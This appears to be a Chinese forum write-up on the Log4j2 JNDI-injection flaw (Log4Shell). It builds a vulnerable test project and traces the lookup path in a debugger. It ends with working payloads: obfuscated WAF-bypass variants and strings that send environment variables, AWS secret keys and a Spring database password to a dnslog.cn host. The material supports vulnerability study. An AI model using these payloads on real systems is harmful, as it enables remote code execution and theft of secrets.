log4j2漏洞整理

log4j2漏洞整理

hackersec已验证会员

黑客倉庫站長

管理成员
贡献: 3%
maven环境

代码:
xml

<span><span><span>&lt;</span>project</span> <span>xmlns</span><span><span>=</span><span>"</span>http://maven.apache.org/POM/4.0.0<span>"</span></span> <span><span>xmlns:</span>xsi</span><span><span>=</span><span>"</span>http://www.w3.org/2001/XMLSchema-instance<span>"</span></span><br>  <span><span>xsi:</span>schemaLocation</span><span><span>=</span><span>"</span>http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd<span>"</span></span><span>&gt;</span></span><br>  <span><span><span>&lt;</span>modelVersion</span><span>&gt;</span></span>4.0.0<span><span><span>&lt;/</span>modelVersion</span><span>&gt;</span></span><br><br>  <span><span><span>&lt;</span>groupId</span><span>&gt;</span></span>top.lnng.log4j2<span><span><span>&lt;/</span>groupId</span><span>&gt;</span></span><br>  <span><span><span>&lt;</span>artifactId</span><span>&gt;</span></span>log4j2<span><span><span>&lt;/</span>artifactId</span><span>&gt;</span></span><br>  <span><span><span>&lt;</span>version</span><span>&gt;</span></span>1.0-SNAPSHOT<span><span><span>&lt;/</span>version</span><span>&gt;</span></span><br>  <span><span><span>&lt;</span>packaging</span><span>&gt;</span></span>jar<span><span><span>&lt;/</span>packaging</span><span>&gt;</span></span><br><br>  <span><span><span>&lt;</span>name</span><span>&gt;</span></span>log4j2<span><span><span>&lt;/</span>name</span><span>&gt;</span></span><br>  <span><span><span>&lt;</span>url</span><span>&gt;</span></span>http://maven.apache.org<span><span><span>&lt;/</span>url</span><span>&gt;</span></span><br><br>  <span><span><span>&lt;</span>properties</span><span>&gt;</span></span><br>    <span><span><span>&lt;</span>project.build.sourceEncoding</span><span>&gt;</span></span>UTF-8<span><span><span>&lt;/</span>project.build.sourceEncoding</span><span>&gt;</span></span><br>  <span><span><span>&lt;/</span>properties</span><span>&gt;</span></span><br><br>  <span><span><span>&lt;</span>dependencies</span><span>&gt;</span></span><br>    <span><span><span>&lt;</span>dependency</span><span>&gt;</span></span><br>      <span><span><span>&lt;</span>groupId</span><span>&gt;</span></span>org.apache.logging.log4j<span><span><span>&lt;/</span>groupId</span><span>&gt;</span></span><br>      <span><span><span>&lt;</span>artifactId</span><span>&gt;</span></span>log4j-core<span><span><span>&lt;/</span>artifactId</span><span>&gt;</span></span><br>      <span><span><span>&lt;</span>version</span><span>&gt;</span></span>2.14.1<span><span><span>&lt;/</span>version</span><span>&gt;</span></span><br>    <span><span><span>&lt;/</span>dependency</span><span>&gt;</span></span><br>    <span><span><span>&lt;</span>dependency</span><span>&gt;</span></span><br>      <span><span><span>&lt;</span>groupId</span><span>&gt;</span></span>org.apache.logging.log4j<span><span><span>&lt;/</span>groupId</span><span>&gt;</span></span><br>      <span><span><span>&lt;</span>artifactId</span><span>&gt;</span></span>log4j-api<span><span><span>&lt;/</span>artifactId</span><span>&gt;</span></span><br>      <span><span><span>&lt;</span>version</span><span>&gt;</span></span>2.14.1<span><span><span>&lt;/</span>version</span><span>&gt;</span></span><br>    <span><span><span>&lt;/</span>dependency</span><span>&gt;</span></span><br>    <span><span><span>&lt;</span>dependency</span><span>&gt;</span></span><br>      <span><span><span>&lt;</span>groupId</span><span>&gt;</span></span>junit<span><span><span>&lt;/</span>groupId</span><span>&gt;</span></span><br>      <span><span><span>&lt;</span>artifactId</span><span>&gt;</span></span>junit<span><span><span>&lt;/</span>artifactId</span><span>&gt;</span></span><br>      <span><span><span>&lt;</span>version</span><span>&gt;</span></span>3.8.1<span><span><span>&lt;/</span>version</span><span>&gt;</span></span><br>      <span><span><span>&lt;</span>scope</span><span>&gt;</span></span>test<span><span><span>&lt;/</span>scope</span><span>&gt;</span></span><br>    <span><span><span>&lt;/</span>dependency</span><span>&gt;</span></span><br>  <span><span><span>&lt;/</span>dependencies</span><span>&gt;</span></span><br>  <span><span><span>&lt;</span>build</span><span>&gt;</span></span><br>    <span><span><span>&lt;</span>plugins</span><span>&gt;</span></span><br>      <span><span><span>&lt;</span>plugin</span><span>&gt;</span></span><br>        <span><span><span>&lt;</span>groupId</span><span>&gt;</span></span>org.apache.maven.plugins<span><span><span>&lt;/</span>groupId</span><span>&gt;</span></span><br>        <span><span><span>&lt;</span>artifactId</span><span>&gt;</span></span>maven-compiler-plugin<span><span><span>&lt;/</span>artifactId</span><span>&gt;</span></span><br>        <span><span><span>&lt;</span>configuration</span><span>&gt;</span></span><br>          <span><span><span>&lt;</span>source</span><span>&gt;</span></span>8<span><span><span>&lt;/</span>source</span><span>&gt;</span></span><br>          <span><span><span>&lt;</span>target</span><span>&gt;</span></span>8<span><span><span>&lt;/</span>target</span><span>&gt;</span></span><br>        <span><span><span>&lt;/</span>configuration</span><span>&gt;</span></span><br>      <span><span><span>&lt;/</span>plugin</span><span>&gt;</span></span><br>    <span><span><span>&lt;/</span>plugins</span><span>&gt;</span></span><br>  <span><span><span>&lt;/</span>build</span><span>&gt;</span></span><br><span><span><span>&lt;/</span>project</span><span>&gt;</span></span>

log4j2.xml


代码:
xml

<span>&lt;?xml version="1.0" encoding="UTF-8"?&gt;</span><br><br><span><span><span>&lt;</span>configuration</span> <span>status</span><span><span>=</span><span>"</span>info<span>"</span></span><span>&gt;</span></span><br>  <span><span><span>&lt;</span>Properties</span><span>&gt;</span></span><br>    <span><span><span>&lt;</span>Property</span> <span>name</span><span><span>=</span><span>"</span>pattern1<span>"</span></span><span>&gt;</span></span>[%-5p] %d %c - %m%n<span><span><span>&lt;/</span>Property</span><span>&gt;</span></span><br>    <span><span><span>&lt;</span>Property</span> <span>name</span><span><span>=</span><span>"</span>pattern2<span>"</span></span><span>&gt;</span></span><br>      =========================================%n 日志级别:%p%n 日志时间:%d%n 所属类名:%c%n 所属线程:%t%n 日志信息:%m%n<br>    <span><span><span>&lt;/</span>Property</span><span>&gt;</span></span><br>    <span><span><span>&lt;</span>Property</span> <span>name</span><span><span>=</span><span>"</span>filePath<span>"</span></span><span>&gt;</span></span>logs/myLog.log<span><span><span>&lt;/</span>Property</span><span>&gt;</span></span><br>  <span><span><span>&lt;/</span>Properties</span><span>&gt;</span></span><br>  <span><span><span>&lt;</span>appenders</span><span>&gt;</span></span> <span><span><span>&lt;</span>Console</span> <span>name</span><span><span>=</span><span>"</span>Console<span>"</span></span> <span>target</span><span><span>=</span><span>"</span>SYSTEM_OUT<span>"</span></span><span>&gt;</span></span><br>    <span><span><span>&lt;</span>PatternLayout</span> <span>pattern</span><span><span>=</span><span>"</span>${pattern1}<span>"</span></span><span>/&gt;</span></span><br>  <span><span><span>&lt;/</span>Console</span><span>&gt;</span></span> <span><span><span>&lt;</span>RollingFile</span> <span>name</span><span><span>=</span><span>"</span>RollingFile<span>"</span></span> <span>fileName</span><span><span>=</span><span>"</span>${filePath}<span>"</span></span><br>               <span>filePattern</span><span><span>=</span><span>"</span>logs/$${date:yyyy-MM}/app-%d{MM-dd-yyyy}-%i.log.gz<span>"</span></span><span>&gt;</span></span><br>    <span><span><span>&lt;</span>PatternLayout</span> <span>pattern</span><span><span>=</span><span>"</span>${pattern2}<span>"</span></span><span>/&gt;</span></span><br>    <span><span><span>&lt;</span>SizeBasedTriggeringPolicy</span> <span>size</span><span><span>=</span><span>"</span>5 MB<span>"</span></span><span>/&gt;</span></span><br>  <span><span><span>&lt;/</span>RollingFile</span><span>&gt;</span></span><br>  <span><span><span>&lt;/</span>appenders</span><span>&gt;</span></span><br>  <span><span><span>&lt;</span>loggers</span><span>&gt;</span></span><br>    <span><span><span>&lt;</span>root</span> <span>level</span><span><span>=</span><span>"</span>info<span>"</span></span><span>&gt;</span></span><br>      <span><span><span>&lt;</span>appender-ref</span> <span>ref</span><span><span>=</span><span>"</span>Console<span>"</span></span><span>/&gt;</span></span><br>      <span><span><span>&lt;</span>appender-ref</span> <span>ref</span><span><span>=</span><span>"</span>RollingFile<span>"</span></span><span>/&gt;</span></span><br>    <span><span><span>&lt;/</span>root</span><span>&gt;</span></span><br>  <span><span><span>&lt;/</span>loggers</span><span>&gt;</span></span><br><span><span><span>&lt;/</span>configuration</span><span>&gt;</span></span>
测试类


java
JavaScript:
<span>public</span> <span>class</span> <span>App</span> <span>{</span><br>    <span>public</span> <span>static</span> <span>void</span> <span>main</span><span>(</span>String<span>[</span><span>]</span> args<span>)</span> <span>{</span><br>        Logger logger <span>=</span> LogManager<span>.</span><span>getLogger</span><span>(</span>LongFunction<span>.</span><span>class</span><span>)</span><span>;</span><br>        String username <span>=</span> <span>"${jndi:ldap://127.0.0.1:8085/GFxElmpt}"</span><span>;</span><br>        logger<span>.</span><span>info</span><span>(</span><span>"User {} login in!"</span><span>,</span> username<span>)</span><span>;</span><br>    <span>}</span><br><span>}</span>
环境整体结构



log4j2漏洞整理-1.png

upload successful


不停的的下断点定位触发位置
发现i为7的时候有执行



log4j2漏洞整理-2.png

upload successful
步进查看




log4j2漏洞整理-3.png

upload successful
判断是否是 Log4j2 的 lookups 功能,我们是有的,继续下走,判断workingBuilder 中是否存在 ${,存在进行截取,然后进行 replace()方法




log4j2漏洞整理-4.png

upload successful




log4j2漏洞整理-5.png

upload successful
跟进 replace() 方法看看




log4j2漏洞整理-6.png

upload successful




log4j2漏洞整理-7.png

upload successful




log4j2漏洞整理-8.png

upload successful
一直步进找业务逻辑,substitute前面都是赋值,只需要关心我们payload的变化就行。
while循环读取将 ${} 中间的内容取出来




log4j2漏洞整理-9.png

upload successful
然后会再次进入substitute,传入的buf没有${}了




log4j2漏洞整理-10.png

upload successful
步进resolveVariable函数




upload successful

upload successful
resolveVariable里面调用了lookup,继续跟进,最终在jndiManager.lookup调用




upload successful

upload successful
jndiManager lookup调用this.context的,JndiManagerFactory 来创建 JndiManager




upload successful

upload successful
看下JndiManagerFactory




upload successful

upload successful
创建InitialContext 实例,返回一个JndiManager对象


JndiManager就是最终触发的位置,后面就是jndi注入的问题了

  1. 先判断内容中是否有${},然后截取${}中的内容,得到我们的恶意payload jndi:xxx
  2. 后使用:分割payload,通过前缀来判断使用何种解析器去lookup
  3. 支持的前缀包括 date, java, marker, ctx, lower, upper, jndi, main, jvmrunargs, sys, env, log4j

${jndi:ldap://127.0.0.1:8085/GFxElmpt}
${jnd${upper:ı}:ldap://[127.0.0.1]]/mESHFnWc} jndi要开389


xml
${jnd${upper:\u0131}:ldap://[127.0.0.1]]/KWhsLxIC}


upload successful

upload successful
${${qax:-j${qax-::qax::-n}}${lower:${upper:d}}${upper:ı}:ldap://127.0.0.1:8086/mhStyxHU}
${jndi:ldap://${env:USER}.dnslog.cn}
${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.dnslog.cn}
${jndi:ldap://${java:version}.u2xf5m.dnslog.cn}
${bundle:application:spring.datasource.password}
 
后退
顶部